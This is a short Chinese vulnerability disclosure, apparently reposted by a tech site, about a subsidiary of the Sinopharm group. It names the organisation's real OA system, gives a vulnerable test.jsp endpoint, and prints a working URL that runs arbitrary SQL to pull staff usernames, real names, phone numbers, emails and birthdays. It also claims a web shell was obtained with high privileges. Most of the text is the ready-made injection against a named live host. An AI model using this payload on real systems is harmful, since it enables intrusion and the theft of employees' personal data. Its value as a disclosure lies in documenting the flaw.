国药集团某子公司SQL注入导致getshell涉及大量敏感文件
目标站点:https://oa.sino-tcm.com/yyoa/
问题链接:https://oa.sino-tcm.com/yyoa/common/js/menu/test.jsp?doType=101&S1=
任意SQL语句执行:
https://oa.sino-tcm.com/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20USERNAME,TRUENAME,HANDPHONE,EMAIL2,BIRTHDAY,stuff_id,SYS_ID%20from%20person%20limit%2010
获取路径:
getshell:https://oa.sino-tcm.com/yyoa/welcome.jsp
大量敏感信息泄露:
权限很高!!!
—-想了解更多的企业安全相关处理怎么解决关注<计算机技术网(www.ctvol.com)!!>
本文来自网络收集,不代表计算机技术网立场,如涉及侵权请联系管理员删除。
ctvol管理联系方式QQ:251552304
本文章地址:https://www.ctvol.com/webstt/esecurity/99727.html